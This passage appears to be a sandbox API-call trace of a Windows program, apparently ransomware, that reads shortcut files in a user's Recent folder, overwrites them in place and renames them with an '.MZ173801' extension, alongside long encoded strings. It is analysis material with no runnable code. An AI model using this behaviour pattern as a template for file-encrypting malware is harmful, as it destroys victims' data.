lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0112.289] GetCurrentThreadId () returned 0x1358 [0112.289] GetCurrentThreadId () returned 0x1358 [0112.289] GetCurrentThreadId () returned 0x1358 [0112.289] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.289] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0112.290] GetCurrentThreadId () returned 0x1358 [0112.290] GetCurrentThreadId () returned 0x1358 [0112.290] GetCurrentThreadId () returned 0x1358 [0112.290] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XDnTXxKBW.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\xdntxxkbw.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.290] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0112.290] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.290] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x23b [0112.290] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.290] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x23b, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x23b, lpOverlapped=0x0) returned 1 [0112.291] CloseHandle (hObject=0x3f4) returned 1 [0112.291] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XDnTXxKBW.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\xdntxxkbw.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.292] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x23b, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x23b, lpOverlapped=0x0) returned 1 [0112.293] CloseHandle (hObject=0x3f4) returned 1 [0112.293] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XDnTXxKBW.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\xdntxxkbw.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XDnTXxKBW.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\xdntxxkbw.lnk.mz173801")) returned 1 [0112.294] GetCurrentThreadId () returned 0x1358 [0112.294] GetCurrentThreadId () returned 0x1358 [0112.294] GetCurrentThreadId () returned 0x1358 [0112.294] GetCurrentThreadId () returned 0x1358 [0112.294] GetCurrentThreadId () returned 0x1358 [0112.294] GetCurrentThreadId () returned 0x1358 [0112.294] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec2fa1b4, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xec2fa1b4, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xec2fa1b4, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x42b, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="XO1z23.lnk", cAlternateFileName="")) returned 1 [0112.294] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0112.294] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0112.294] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XO1z23.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\xo1z23.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec2fa1b4, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xec2fa1b4, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xec2fa1b4, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x42b)) returned 1 [0112.295] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.295] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0112.295] GetCurrentThreadId () returned 0x1358 [0112.295] GetCurrentThreadId () returned 0x1358 [0112.295] GetCurrentThreadId () returned 0x1358 [0112.295] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.295] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0112.296] GetCurrentThreadId () returned 0x1358 [0112.296] GetCurrentThreadId () returned 0x1358 [0112.296] GetCurrentThreadId () returned 0x1358 [0112.296] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XO1z23.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\xo1z23.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.296] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0112.296] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.296] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x42b [0112.296] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.296] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x42b, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x42b, lpOverlapped=0x0) returned 1 [0112.297] CloseHandle (hObject=0x3f4) returned 1 [0112.297] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XO1z23.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\xo1z23.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.298] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x42b, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x42b, lpOverlapped=0x0) returned 1 [0112.299] CloseHandle (hObject=0x3f4) returned 1 [0112.300] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XO1z23.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\xo1z23.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XO1z23.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\xo1z23.lnk.mz173801")) returned 1 [0112.300] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75984006, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75984006, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x75985390, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3db, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Yv-akVjSVB.lnk", cAlternateFileName="YV-AKV~1.LNK")) returned 1 [0112.300] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0112.300] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0112.300] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Yv-akVjSVB.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\yv-akvjsvb.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 